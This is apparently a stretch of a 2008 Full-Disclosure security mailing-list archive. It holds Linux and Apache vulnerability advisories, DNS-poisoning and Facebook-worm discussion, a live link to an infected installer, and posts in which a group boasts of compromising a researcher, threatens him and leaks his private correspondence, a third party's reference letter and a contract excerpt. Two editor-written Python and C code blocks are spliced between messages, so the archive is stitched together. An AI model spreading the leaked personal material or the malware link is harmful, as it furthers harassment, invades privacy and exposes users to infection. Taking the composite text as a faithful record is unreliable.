>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> Hosted and sponsored by Secunia - http://secunia.com/ >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > > >-- >Paul Schmehl, Senior Infosec Analyst >As if it wasn't already obvious, my opinions are my own and not those of my >employer. >******************************************* >Check the headers before clicking on Reply. > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ From hdw at kallisti.se Thu Aug 7 00:31:34 2008 From: hdw at kallisti.se (Anders B Jansson) Date: Thu, 07 Aug 2008 01:31:34 +0200 Subject: [Full-disclosure] Media backlash begins against HD Moore and I)ruid In-Reply-To: References: <4b6ee9310807261119s32874459oa14360cdbe0f88b8@mail.gmail.com> <4b6ee9310808031436j5af63b56oa70e646e4948bf34@mail.gmail.com> <15949.1217821466@turing-police.cc.vt.edu> <4b6ee9310808050558w6761089fvdd9d8a2b064bd575@mail.gmail.com> <16480.1217956110@turing-police.cc.vt.edu> <4b6ee9310808051040i3936d118gd596a8689d41de62@mail.gmail.com> <21881.1217962645@turing-police.cc.vt.edu> <4b6ee9310808051236m50baad19sc9fc4bda17e81646@mail.gmail.com> <008001c8f7fc$ba7afa20$2f70ee60$@com> Message-ID: <489A3456.8010001@kallisti.se> Paul Schmehl wrote: > Insane == responding to n3td3v. > > So how many on this list meet the definition of insane? > Everyone. 
--
// hdw

From pinar at pardus.org.tr Thu Aug 7 01:27:31 2008
From: pinar at pardus.org.tr (Pınar Yanardağ)
Date: Thu, 07 Aug 2008 03:27:31 +0300
Subject: [Full-disclosure] [PLSA 2008-18] Pidgin: Spoofing Vulnerability
Message-ID: <489A4173.4030209@pardus.org.tr>

------------------------------------------------------------------------
Pardus Linux Security Advisory 2008-18                security at pardus.org.tr
------------------------------------------------------------------------
Date: 2008-08-07
Severity: 2
Type: Remote
------------------------------------------------------------------------

Summary
=======

A security issue has been reported in Pidgin, which can be exploited by malicious people to conduct spoofing attacks.

Description
===========

The problem is that the certificate presented by e.g. a Jabber server at the beginning of an SSL session is not verified. This can be exploited to spoof valid servers via a man-in-the-middle attack.

Successful exploitation requires that Pidgin is configured to use the NSS plugin.

Affected packages:

  Pardus 2008:
    pidgin, all before 2.4.3-21-3
  Pardus 2007:
    pidgin, all before 2.4.3-21-14

Resolution
==========

There are update(s) for pidgin. You can update them via Package Manager or with a single command from console:

  Pardus 2008:
    pisi up pidgin
  Pardus 2007:
    pisi up pidgin

References
==========

* http://secunia.com/advisories/31390/
* http://developer.pidgin.im/ticket/6500

------------------------------------------------------------------------

--
Pınar Yanardağ
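As an added example for the Pidgin advisory above (editor-written code, not Pidgin's and not its NSS plugin's), the Python block below shows the two checks a TLS client must make before trusting a Jabber server, which is what "the certificate ... is not verified" means in practice: an audit that flags a client context configured the way the advisory describes (chain never validated, name never checked), and an RFC 6125-style DNS-ID match of the expected server name against the certificate in the dictionary shape Python's ssl module reports. The certificate dictionaries and host names are constructed samples; no network connection is made.

```python
"""Added example: the two checks the advisory says Pidgin's NSS path skipped.

Not Pidgin code. Certificates below are constructed samples in the shape
returned by ssl.SSLSocket.getpeercert(); no network connection is made.
"""
import ssl


def audit_tls_context(ctx: ssl.SSLContext) -> list[str]:
    """Return the ways a client using `ctx` could be fooled by a man in the middle."""
    findings = []
    if ctx.verify_mode == ssl.CERT_NONE:
        findings.append("verify_mode is CERT_NONE: any certificate, forged ones included, is accepted")
    if not ctx.check_hostname:
        findings.append("check_hostname is off: a valid certificate for some other host is accepted")
    return findings


def make_client_context(verify: bool) -> ssl.SSLContext:
    """verify=False is the advisory's bug (session set up, certificate ignored);
    verify=True is what a fixed client does."""
    if verify:
        return ssl.create_default_context()  # CERT_REQUIRED, check_hostname, system CA store
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False                # must be cleared before verify_mode can be CERT_NONE
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def _dns_id_matches(pattern: str, host: str) -> bool:
    """RFC 6125 style DNS-ID comparison: case-insensitive, and a wildcard only
    as the entire leftmost label of a name with at least three labels, so
    '*.example.org' matches 'xmpp.example.org' but not 'a.b.example.org'
    nor 'example.org'."""
    pattern, host = pattern.lower().rstrip("."), host.lower().rstrip(".")
    if pattern == host:
        return True
    p_labels, h_labels = pattern.split("."), host.split(".")
    if p_labels[0] != "*" or len(p_labels) < 3 or len(p_labels) != len(h_labels):
        return False
    return p_labels[1:] == h_labels[1:]


def hostname_matches(cert: dict, hostname: str) -> bool:
    """True if the peer certificate is issued for `hostname`.
    subjectAltName dNSName entries are authoritative; the subject CN is only
    consulted when the certificate carries no SAN at all."""
    san_dns = [value for kind, value in cert.get("subjectAltName", ()) if kind == "DNS"]
    if san_dns:
        return any(_dns_id_matches(p, hostname) for p in san_dns)
    for rdn in cert.get("subject", ()):
        for key, value in rdn:
            if key == "commonName":
                return _dns_id_matches(value, hostname)
    return False


# Constructed sample: what a legitimate XMPP server's certificate might report.
JABBER_CERT = {
    "subject": ((("commonName", "xmpp.example.org"),),),
    "subjectAltName": (("DNS", "xmpp.example.org"), ("DNS", "*.example.org")),
}
# Constructed sample: a perfectly valid certificate the attacker owns for a different domain;
# chain validation alone would accept it, only the name check rejects it.
MITM_CERT = {
    "subject": ((("commonName", "xmpp.example.net"),),),
    "subjectAltName": (("DNS", "xmpp.example.net"),),
}


if __name__ == "__main__":
    for verify in (False, True):
        print(f"verify={verify}: {audit_tls_context(make_client_context(verify)) or ['ok']}")
    print("JABBER_CERT for xmpp.example.org:", hostname_matches(JABBER_CERT, "xmpp.example.org"))
    print("MITM_CERT for xmpp.example.org:  ", hostname_matches(MITM_CERT, "xmpp.example.org"))
```

The audit is worth running against any client context you build by hand: a CERT_NONE context completes the handshake with whatever certificate the man in the middle presents, and a CERT_REQUIRED context without a hostname check still accepts a certificate the attacker legitimately holds for another domain, which is why both findings are reported separately.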
http://pinguar.org

From pinar at pardus.org.tr Thu Aug 7 01:27:43 2008
From: pinar at pardus.org.tr (Pınar Yanardağ)
Date: Thu, 07 Aug 2008 03:27:43 +0300
Subject: [Full-disclosure] [PLSA 2008-19] Git: Multiple Buffer Overflows
Message-ID: <489A417F.5060200@pardus.org.tr>

------------------------------------------------------------------------
Pardus Linux Security Advisory 2008-19                security at pardus.org.tr
------------------------------------------------------------------------
Date: 2008-08-07
Severity: 2
Type: Remote
------------------------------------------------------------------------

Summary
=======

Some vulnerabilities have been reported in GIT, which can potentially be exploited by malicious people to compromise a user's system.

Description
===========

The vulnerabilities are caused by boundary errors in various functions when processing overly long repository pathnames. These can be exploited to cause stack-based buffer overflows by tricking a user into running e.g. "git-diff" or "git-grep" against a repository containing pathnames that are larger than the "PATH_MAX" value on the user's system.

Successful exploitation may allow execution of arbitrary code.

Affected packages:

  Pardus 2008:
    git, all before 1.5.6.4-66-3
    git-emacs, all before 1.5.6.4-66-3
    gitweb, all before 1.5.6.4-66-3
  Pardus 2007:
    git, all before 1.5.6.4-66-51
    git-emacs, all before 1.5.6.4-66-25
    gitweb, all before 1.5.6.4-66-27

Resolution
==========

There are update(s) for git, git-emacs, gitweb. You can update them via Package Manager or with a single command from console:

  Pardus 2008:
    pisi up git git-emacs gitweb
  Pardus 2007:
    pisi up git git-emacs gitweb

References
==========

* http://www.kernel.org/pub/software/scm/git/docs/RelNotes-1.5.6.4.txt
* http://kerneltrap.org/mailarchive/git/2008/7/16/2529284
* http://secunia.com/advisories/31347/

------------------------------------------------------------------------

--
Pınar Yanardağ
http://pinguar.org From internetsuperheros at hushmail.com Thu Aug 7 01:41:55 2008 From: internetsuperheros at hushmail.com (internetsuperheros at hushmail.com) Date: Thu, 07 Aug 2008 02:41:55 +0200 Subject: [Full-disclosure] Petko D. Petkov files unleashed, guilty by Internet council Message-ID: <20080807004156.BCD5711803C@mailserver5.hushmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 bl4qh4t l1b3r4t10n 4rmy presents: the pdp files =============================================== The Great Council of Internet Superheros, with help of bl4qh4t l1b3r4t10n 4rmy commandos, has condemned Petko D. Petkov to public exposure, continuous siege and compromise of his electronic and networked assets. Petko D. Petkov has been accused and declared guilty of several crimes against God, Humankind, Honor, the Queen and his Mother (wherever her grave is located in Poland): 01. Extreme media and press whoring. 02. Flagrant behavior and lack of discretion and respect for the spirit and tradition of hacking. 03. Claiming hacker status. 04. Pretending to be ethical while conducting illegal and morally questionable behavior. 05. Cheating on his anorexic, sex-starved girlfriend. 06. Excessive mailbox usage and size (Note: we are superheros but we don't like to archive 2GB mailbox files. Next time make it easier and help us by cleaning up a bit). 07. Animal cruelty (killing bugs and selling them to ZDI and iDEFENSE). 08. Waste of public and Internet resources. 09. Using the hacker word for self-promotion and advertisement with commercial intent. 10. Attacking and mis-using the meaning of 0-day. 11. Exceeding the limit of mailing-list subscibrals and monthly post quotas set by the Government of the Internet Chamber of Commerce and Etcetera. The Great Council of Internet Superheros is now actively researching and investigating several security industry personalities for other suspected crimes. 
In the weeks and months to come, other individuals might be judged and accused of these despicable activities. We will strike with great vengeance and furious anger those who attempt to attack, discredit and offend our brothers. Using our amassed amounts of awesomeness, super powers and truly useful 0day, there will be no single networked machine capable of withstanding our acts of justice. Oh we say. Now get the mailbox files and mirror them, son. [ASCII-art logo] TO PROTECT THE INNOCENT, TO SERVE FOR GREAT JUSTICE, TO SPREAD JOY AND HAPPINESS, TO BRING RUIN AND DESPAIR TO THE GUILTY, HERE BE INTERNET SUPERHEROS...
* WE ARE WATCHING *

what you have all been waiting patiently for:
=============================================

[Download links for the stolen 2005-2007 mailbox archive (four RAR parts plus MD5, SHA-1 and SHA-256 checksum files) and the address of a web mirror of it have been removed from this archive copy.]

With love, the Great Council of Internet Superheros.
"To protect exposure and serve ruin"

-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQMCAAYFAkiaRJkACgkQ5g5u/REitpZgpgQAgwNg+h/IJU9sCXpA/iioDo9QIrSv
sWLAPHv2SQpCP2RCSUa8xQDXnvA6zuPLYevwwx6ZajMXeypT0MlwcV3nbN8TH/o6NYVz
+Tq2UEv/StXvN20fTcsFaXX6ZbjKIroW2vuZDEzMIDIqCqbuV90t2cwW6q7lwAWGN6Ot
Vih+Bqk=
=iIf7
-----END PGP SIGNATURE-----

From internetsuperheros at hushmail.com Thu Aug 7 01:44:53 2008
From: internetsuperheros at hushmail.com (internetsuperheros at hushmail.com)
Date: Thu, 07 Aug 2008 02:44:53 +0200
Subject: [Full-disclosure] Petko D. Petkov files unleashed, guilty by Internet council
Message-ID: <20080807004454.5625811803C@mailserver5.hushmail.com>

[Repost of the preceding message with the same body and download links; omitted as a duplicate.]

From internetsuperheros at hushmail.com Thu Aug 7 02:30:39 2008
From: internetsuperheros at hushmail.com (Great Council of Internet Superheros)
Date: Thu, 07 Aug 2008 03:30:39 +0200
Subject: [Full-disclosure] GNUCITIZEN Stumbleupon account revised
Message-ID: <20080807013042.D498711803E@mailserver5.hushmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

The Chamber of Internet Justice has released the necessary changes to the Stumbleupon account used by Petko D. Petkov. Thanks to Kentucky Fried Chicken sponsoring, the account is now legal according to the Internet Law and Code of Misconduct.

You can find pdp's updated page at: http://pdp.stumbleupon.com/

Kentucky Fried Chicken has sponsored this e-mail. Thank you.

Love, the Great Council of Internet Superheros.
"To protect exposure and serve ruin."

-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQMCAAYFAkiaUAoACgkQ5g5u/REitpbKGwP/d5/Pp2xDUu+kdAVGQn/bhKcvdO97
I41PZzzzYLPhSekRZnycOGJz21bnRvmunFp0USaPMmO4wsNj1iLjsvoDqgd5qdZveQK4
Mcf73Zk1TBzbX1SHGGYEyJ6kWXMBkIBRv1QKzRZmXzz6nN/5lgLrSb5LQiDskBwEr49g
QHkj3xs=
=8NeX
-----END PGP SIGNATURE-----

From internetsuperheros at hushmail.com Thu Aug 7 03:24:57 2008
From: internetsuperheros at hushmail.com (Great Council of Internet Superheros)
Date: Thu, 07 Aug 2008 04:24:57 +0200
Subject: [Full-disclosure] More information on Petko D. Petkov
Message-ID: <20080807022458.D375211803C@mailserver5.hushmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

The Great Council approved release of these highly sugared love emails, personal documents and other account information:

[The remainder of this message, consisting of a home address, a third party's name, address, mobile number and e-mail address, a date of birth, bank branch, sort code and account number, usernames and passwords for several accounts, a password-reset e-mail and private correspondence reproduced with full headers, and a personal reference letter, has been removed from this archive copy.]
agency as a Senior Account Manager. During this period She'd been not only responsible for the maintaining the relations with the media, but also for the creation and the execution of various communications strategies and projects. Providing highest professional consulting , Ivana was capable to switch into one task to another without any difficulties and hesitation. Her ability to remain unflustered during frenzied periods like crisis situations and major campaigns proves her ability to work well under pressure and not to make any compromises with the quality of service. Further more, the willingness to seek new ways to explore her creativity and knowledge makes her one of the best and remarkable employees we've ever had! Ivana would be a tremendous asset for your company and has my highest recommendation! Please let me know if you need further information! Your Sincerely, Victoria Encheva PR Manager ?D&D? PR Agency - -------------------------- Petkov's brilliant XSS book contract excerpt: <...> We are very happy to learn that you have agreed to prepare a contribution for XSS Exploits: Cross Site Scripting Attacks and Defense (the ?Work?), tentatively entitled: Building the Fundemental Toolkit - Analyzing HTTP Traffix with Firefox Extensions ? LiveHTTPHeaders, Building the Fundemental Toolkit - Automating Inspection ? GreaseMonkey, Building the Fundemental Toolkit - Debugging DHTML With Firefox Extensions - DOM Inspector Firefox Extension * Building the Fundemental Toolkit - Debugging DHTML With Firefox Extensions - FireBug Firefox Extension, Cross-Site Scripting - DOM- based, Cross-Site Scripting - Non-Persistent, Cross-Site Scripting ? Persistent, Exploit Frameworks ? AttackAPI, Exploit Frameworks ? BeEF, Intranet Hacking - Port scanning (the ?Contribution?), to be published by Syngress, an imprint of Elsevier Inc. (the ?Publisher?). <...> Love, the Great Council of Internet Superheros. "To protect exposure and serve ruin." 
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQMCAAYFAkiaXMUACgkQ5g5u/REitpYRqwP7BC8Fe0eCaXHfSBuh8e+XEgwEeDss
hHSSCv5EfNBq6a9ynknInSJPdBNVGj040qthYPpJEblwU8p/rmtlCjZHVHovj2YwfQws
gqazymO80Uvrv9IVsCNRUojNJhrhElxlBB4WQuQ5Jq9ZeIsp5GrTu6PYeLcskjaysbkK
rkQF0zQ=
=o9Mp
-----END PGP SIGNATURE-----

From infosecdramareport at gmail.com Thu Aug 7 05:14:53 2008
From: infosecdramareport at gmail.com (InfoSec DramaReport)
Date: Wed, 6 Aug 2008 21:14:53 -0700
Subject: [Full-disclosure] Kaminsky Quittinq? Coffee Shop Inevitable?

8/6/2008
An Information Security Drama Report Exclusive

It was BlackHat Vegas 2008 at the Prestigious Pwnie Awards and tensions were running high. The audience had been waiting in anticipation for the announcement of the winner of the "Most Overhyped Bug" category. Nominees included pagvac's "BT Home Hub authentication bypass", Symantec's "Adobe Flash Player non-0day remote code execution", and Dan Kaminsky's "Unspecified DNS cache poisoning vulnerability". However, while the competition was fierce, there was one obvious crowd favorite as the presenters pointed out by saying, "sixty percent of the nominations in this category were for Dan Kaminsky's Bug".

After a light-hearted description of the nominated bugs and an impromptu drum roll the winner was announced... "Dan Kaminsky!". The crowd applauded. Somewhat to the surprise of the audience, Dan approached the podium, accepted the award, and for his speech he was paraphrased as saying, "There are the kind of people who fix bugs and there are the kind of people who find bugs. I'm glad to be both." Dan then proceeded to slam the microphone down on the podium before going briefly back to his seat after which, as one attendee put it, "[Dan] strode out of the room with his head held up high, Pawnie in hand, and a smirk on his face". Dan's wife followed closely behind with their bags.

Further eye witness reports say that Dan Kaminsky was seen immediately after the awards ceremony repeating the following phrase several times, "I'm done I'm just done" to his wife who appeared to be consoling him in the wake of his acceptance speech.

Here at ISDR we can only speculate that this means the inevitable loss of yet another valued Information Security professional to the honest ranks of coffee shop or bar owners. Our editors and staff would like to let Dan Kaminsky know that he will be missed and if this year is any portent, a nominee and winner for a Pawnie Lifetime Achievement Award in 2009.

Good luck and God speed everyone in their unspecified DNS cache poisoning attacks.

From juha-matti.laurio at netti.fi Thu Aug 7 06:00:13 2008
From: juha-matti.laurio at netti.fi (Juha-Matti Laurio)
Date: Thu, 7 Aug 2008 08:00:13 +0300 (EEST)
Subject: [Full-disclosure] [funsec] facebook messages worm
Message-ID: <32463282.333111218085213497.JavaMail.juha-matti.laurio@netti.fi>

It has the following mechanism according to McAfee:
http://vil.nai.com/vil/content/v_148955.htm

They use the name W32/Koobface.worm and Kaspersky (Kaspersky Labs originally discovered this threat) uses the name Net-Worm.Win32.Koobface.b.

More information here too:
http://www.pcmag.com/article2/0,2817,2327272,00.asp

Juha-Matti

"John C. A. Bambenek, GCIH, CISSP" [bambenek.infosec at gmail.com] wrote:
> What's the infection vector? URL Link? Rouge Facebook app?
> 
> On Wed, Aug 6, 2008 at 4:44 PM, Gadi Evron wrote:
> 
> > Hi all.
> > 
> > There's a facebook (possibly worm) something malicious sending fake
> > messages from real users (friends).
> > 
> > The sample also has a remote drop site (verified by someone who shall
> > remain nameless).
> > 
> > This is possibly zlob, not verified. Thanks Nick Bilogorskiy for his help.
> > 
> > Infection sites seen so far are on .pl domains.
> > 
> > The AV industry will soon add detection.
> > Facebook's security folks are very capable, so I am not worried on that
> > front.
> > 
> > It's not that we didn't expect this for a long time now, but...
> > Be careful. Some users know to be careful in email.. but not on facebook.
> > 
> > Note: unlike 2003 when we called everything a worm and the 90s when
> > everything was a virus--this is a bot which also spreads/infects on
> > facebook.
> > 
> > Gadi.
> > 
> > 
> > -- 
> > "You don't need your firewalls! Gadi is Israel's firewall."
> > -- Itzik (Isaac) Cohen, "Computers czar", Senior Deputy to the
> > Accountant General,
> > Israel's Ministry of Finance, at the government's CIO conference,
> > 2005.
> > 
> > (after two very funny self-deprecation quotes, time to even things up!)
> > 
> > My profile and resume:
> > http://www.linkedin.com/in/gadievron

From pschmehl_lists at tx.rr.com Thu Aug 7 05:45:22 2008
From: pschmehl_lists at tx.rr.com (Paul Schmehl)
Date: Wed, 06 Aug 2008 23:45:22 -0500
Subject: [Full-disclosure] Kaminsky Quittinq? Coffee Shop Inevitable?

--On August 6, 2008 9:14:53 PM -0700 InfoSec DramaReport wrote:
> 8/6/2008
> An Information Security Drama Report Exclusive
> 
> 
> It was BlackHat Vegas 2008 at the Prestigious Pwnie Awards and
> tensions were running high.
> The audience had been waiting in anticipation for the announcement of the
> winner of the "Most Overhyped Bug" category. Nominees included pagvac's
> "BT Home Hub authentication bypass", Symantec's "Adobe Flash Player
> non-0day remote code execution", and Dan Kaminsky's "Unspecified DNS
> cache poisoning vulnerability".
> 

Typical journalists. Don't even know that Kaminsky doesn't have a wife. The New York Times is looking for your talent.

Paul Schmehl, If it isn't already obvious,
my opinions are my own and not those of my employer.
******************************************
WARNING: Check the headers before replying

From research at sec-consult.com Thu Aug 7 09:25:30 2008
From: research at sec-consult.com (Bernhard Mueller)
Date: Thu, 7 Aug 2008 10:25:30 +0200
Subject: [Full-disclosure] Whitepaper: DNS zone redelegation
Message-ID: <1218097530.312.3.camel@b4byl0n>

Newly emerging techniques of DNS cache poisoning have caused quite a stir recently, prompting security researchers to speculate on the nature of the issue, and naturally inducing press stunts by some individuals, including "accidental" information leaks and hasty exploit releases. Many other, more relaxed researchers, who had figured out the attack and had coded working exploits within a few hours (which, by the way, was incredibly easy to do, knowing that an undocumented attack actually existed), decided to coordinate with Dan Kaminsky, who had organized a huge multi-vendor security patch, and withhold information for the proposed 30 days.

SEC Consult's researchers were among the first to write a working "fast cache poisoning" exploit, details of which will now be published in a whitepaper, which also includes some calculations on the reliability of the attack.

The paper details a way of making DNS cache poisoning / response spoofing attacks more reliable. A caching server will store any NS delegation RRs if it receives a delegation which is "closer" to the answer than the nameservers it already knows. By spoofing replies that contain a delegation for a single node, the nameserver will eventually cache the delegation when we hit the right transfer id.

http://www.sec-consult.com/whitepapers_e.html

Regards,
Bernhard

-- 
_________________________________________
Bernhard Mueller
Security Consultant

SEC Consult Unternehmensberatung GmbH
www.sec-consult.com

A-1190 Vienna, Mooslackengasse 17
phone +43 1 8903043 34
fax +43 1 8903043 15
mobile +43 676 840301 718
email b.mueller at sec-consult.com

Firmenbuch Wiener Neustadt: 227896t, UID: ATU56165223
Firmensitz: Prof. Dr. Stephan Korenstraße 10, A-2700 Wiener Neustadt

Advisor for your information security.

From marc_bevand at rapid7.com Wed Aug 6 18:25:26 2008
From: marc_bevand at rapid7.com (Marc Bevand)
Date: Wed, 6 Aug 2008 17:25:26 +0000 (UTC)
Subject: [Full-disclosure] Apache HTTP Server mod_proxy_ftp Wildcard Characters Cross-Site Scripting

Rapid7 Advisory R7-0033
Apache HTTP Server mod_proxy_ftp Wildcard Characters Cross-Site Scripting

Discovered: July 25, 2008
Published: August 5, 2008
Revision: 1.1
http://www.rapid7.com/advisories/R7-0033
CVE: CVE-2008-2939

1. Affected system(s):

KNOWN VULNERABLE:
o Apache HTTP Server 2.2.9 (and earlier 2.2.x versions)
o Apache HTTP Server 2.0.63 (and earlier 2.0.x versions)

NOT VULNERABLE:
o Apache HTTP Server 1.3.x (because mod_proxy_ftp doesn't support wildcard characters)

2.
Summary

The mod_proxy_ftp module of the Apache HTTP Server is vulnerable to a cross-site scripting vulnerability when handling requests with wildcard characters (aka globbing characters).

3. Vendor status and information

Apache HTTP Server Project
http://httpd.apache.org

The developers were notified of this vulnerability on July 28, 2008 via the private security mailing list security at apache.org. They acknowledged it within 12 hours. On July 29, they assigned it a CVE ID. On August 5, the vulnerability was fixed in all SVN branches:

o Commit to main trunk: http://svn.apache.org/viewvc?view=rev&revision=682868
o Commit to 2.2 branch: http://svn.apache.org/viewvc?view=rev&revision=682870
o Commit to 2.0 branch: http://svn.apache.org/viewvc?view=rev&revision=682871

4. Solution

Upgrade to Apache HTTP Server 2.2.10 or 2.0.64 (as of August 6, these have not been released yet), or apply the patch from SVN commit r682868.

5. Detailed analysis

When Apache HTTP Server is configured with proxy support ("ProxyRequests On" in the configuration file), and when mod_proxy_ftp is enabled to support FTP-over-HTTP, requests containing wildcard characters (asterisk, tilde, opening square bracket, etc) such as:

  GET ftp://host/* HTTP/1.0

lead to cross-site scripting in the response returned by mod_proxy_ftp (the HTML markup of the listing did not survive archiving; only its text is shown):

  [...]
  Directory of ftp://host/*
  [...]

To exploit this vulnerability, 'host' must be running an FTP server, and the last directory component of the path (the XSS payload) must be composed of at least 1 wildcard character and must not contain any forward slashes. In practice, this last requirement is not an obstacle at all to develop working exploits, example:

  ftp://host/*

6. Credit

Discovered by Marc Bevand of Rapid7.

7. Contact Information

Rapid7, LLC
Email: advisory at rapid7.com
Web: http://www.rapid7.com
Phone: +1 (617) 247-1717

8. Disclaimer and Copyright

Rapid7, LLC is not responsible for the misuse of the information provided in our security advisories. These advisories are a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice.

This advisory Copyright (C) 2008 Rapid7, LLC. Permission is hereby granted to redistribute this advisory, providing that no changes are made and that the copyright notices and disclaimers remain intact.

From mbaiter2 at gmail.com Wed Aug 6 19:29:42 2008
From: mbaiter2 at gmail.com (Dr. Mark A. Baiter [Chief Scatological Consultant])
Date: Wed, 6 Aug 2008 23:59:42 +0530
Subject: [Full-disclosure] infected file ( can someone please report and take it down ? )
Message-ID: <9396129f0808061129i396fde00i61e83e3f721196a@mail.gmail.com>

File link
http://web292.webbox443.server-home.org/install.exe
77 kb - packed

install.exe analysis link
http://www.virustotal.com/analisis/4ebbd8e0045798cee6e505f79fe88671
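The defect in section 5 of the Rapid7 mod_proxy_ftp advisory above, as an added example in C that is not Apache httpd's or Rapid7's code: a minimal directory-listing header built once with the request path interpolated verbatim (the vulnerable pattern) and once through an HTML-escaping helper (the pattern a fix applies before the path reaches the response). The `<h2>`/`<a>` markup, the `html_escape()` helper (a stand-in for a real escaping routine such as Apache's ap_escape_html) and the constructed path `/*<b>x</b>` are assumptions for illustration; the page itself shows only the stripped text `Directory of ftp://host/*`.

```c
/* Added example (not Apache httpd or Rapid7 code): the unescaped-path
 * pattern behind CVE-2008-2939, beside the escaped form. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper standing in for an HTML-escaping routine such as
 * Apache's ap_escape_html(). Encodes the five characters that are
 * significant in HTML text and in double-quoted attribute values.
 * Returns a malloc'd string; the caller frees it. */
char *html_escape(const char *s)
{
    size_t len = 0;
    for (const char *p = s; *p; p++) {
        switch (*p) {
        case '&':  len += 5; break;  /* &amp;  */
        case '<':  len += 4; break;  /* &lt;   */
        case '>':  len += 4; break;  /* &gt;   */
        case '"':  len += 6; break;  /* &quot; */
        case '\'': len += 5; break;  /* &#39;  */
        default:   len += 1; break;
        }
    }
    char *out = malloc(len + 1);
    if (!out)
        return NULL;
    char *o = out;
    for (const char *p = s; *p; p++) {
        switch (*p) {
        case '&':  o += sprintf(o, "&amp;");  break;
        case '<':  o += sprintf(o, "&lt;");   break;
        case '>':  o += sprintf(o, "&gt;");   break;
        case '"':  o += sprintf(o, "&quot;"); break;
        case '\'': o += sprintf(o, "&#39;");  break;
        default:   *o++ = *p; break;
        }
    }
    *o = '\0';
    return out;
}

/* Formats the listing header (assumed markup). Both callers below use it;
 * the only difference is whether the values were escaped first. */
static char *format_listing_header(const char *host, const char *path)
{
    const char *fmt =
        "<h2>Directory of <a href=\"ftp://%s%s\">ftp://%s%s</a></h2>";
    size_t n = strlen(fmt) + 2 * (strlen(host) + strlen(path)) + 1;
    char *out = malloc(n);
    if (out)
        snprintf(out, n, fmt, host, path, host, path);
    return out;
}

/* Vulnerable pattern: the request path reaches the HTML verbatim, so a
 * wildcard path component that carries markup is rendered as markup. */
char *listing_header_unsafe(const char *host, const char *path)
{
    return format_listing_header(host, path);
}

/* Fixed pattern: escape every untrusted value before interpolating it. */
char *listing_header_safe(const char *host, const char *path)
{
    char *eh = html_escape(host);
    char *ep = html_escape(path);
    char *out = (eh && ep) ? format_listing_header(eh, ep) : NULL;
    free(eh);
    free(ep);
    return out;
}

/* Review check: returns 1 when an untrusted value that contains a
 * markup-significant character appears verbatim in the generated HTML. */
int leaks_markup(const char *html, const char *untrusted)
{
    return strpbrk(untrusted, "<>&\"'") != NULL && strstr(html, untrusted) != NULL;
}

int main(void)
{
    /* Constructed request path: a wildcard component carrying markup. */
    const char *path = "/*<b>x</b>";
    char *u = listing_header_unsafe("host", path);
    char *s = listing_header_safe("host", path);
    printf("unsafe: %s\n  leaks markup: %d\n", u, leaks_markup(u, path));
    printf("safe:   %s\n  leaks markup: %d\n", s, leaks_markup(s, path));
    free(u);
    free(s);
    return 0;
}
```

The check a reviewer wants is `leaks_markup()`: the untrusted path component must not reach the output unchanged once it contains any markup-significant character, in the attribute position as well as the text position. Escaping for both positions is the same here only because the `href` value is wrapped in double quotes, which `html_escape()` encodes; an unquoted attribute would need stricter handling.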
From ge at linuxbox.org Wed Aug 6 22:50:16 2008
From: ge at linuxbox.org (Gadi Evron)
Date: Wed, 6 Aug 2008 16:50:16 -0500 (CDT)
Subject: [Full-disclosure] [funsec] facebook messages worm

http://www.kaspersky.com/news?id=20757567

7 days of seeding to impact.

Gadi.

On Wed, 6 Aug 2008, Gadi Evron wrote:
> Hi all.
> 
> There's a facebook (possibly worm) something malicious sending fake
> messages from real users (friends).
> 
> The sample also has a remote drop site (verified by someone who shall
> remain nameless).
> 
> This is possibly zlob, not verified. Thanks Nick Bilogorskiy for his help.
> 
> Infection sites seen so far are on .pl domains.
> 
> The AV industry will soon add detection.
> Facebook's security folks are very capable, so I am not worried on that
> front.
> 
> It's not that we didn't expect this for a long time now, but...
> Be careful. Some users know to be careful in email.. but not on facebook.
> 
> Note: unlike 2003 when we called everything a worm and the 90s when
> everything was a virus--this is a bot which also spreads/infects on facebook.
> 
> Gadi.
> 
> 
> -- 
> "You don't need your firewalls! Gadi is Israel's firewall."
> -- Itzik (Isaac) Cohen, "Computers czar", Senior Deputy to the Accountant General,
> Israel's Ministry of Finance, at the government's CIO conference, 2005.
> 
> (after two very funny self-deprecation quotes, time to even things up!)
> 
> My profile and resume:
> http://www.linkedin.com/in/gadievron
> _______________________________________________
> Fun and Misc security discussion for OT posts.
> https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
> Note: funsec is a public and open mailing list.
> 

From az-guy at hushmail.com Wed Aug 6 23:11:29 2008
From: az-guy at hushmail.com (az-guy at hushmail.com)
Date: Wed, 06 Aug 2008 15:11:29 -0700
Subject: [Full-disclosure] No subject
Message-ID: <20080806221130.D0C83158041@mailserver6.hushmail.com>

Not just Rouge apps, it's much more widespread: other colors such as magenta, mauve, fuchsia, and even the extremes of pink and purple can also be impacted.

On Wed, Aug 6, 2008 at 2:56 PM, John C. A. Bambenek, GCIH, CISSP wrote:

What's the infection vector? URL Link? Rouge Facebook app?

On Wed, Aug 6, 2008 at 4:44 PM, Gadi Evron wrote:

Hi all.

There's a facebook (possibly worm) something malicious sending fake messages from real users (friends).

The sample also has a remote drop site (verified by someone who shall remain nameless).

This is possibly zlob, not verified. Thanks Nick Bilogorskiy for his help.

Infection sites seen so far are on .pl domains.

The AV industry will soon add detection.
Facebook's security folks are very capable, so I am not worried on that front.

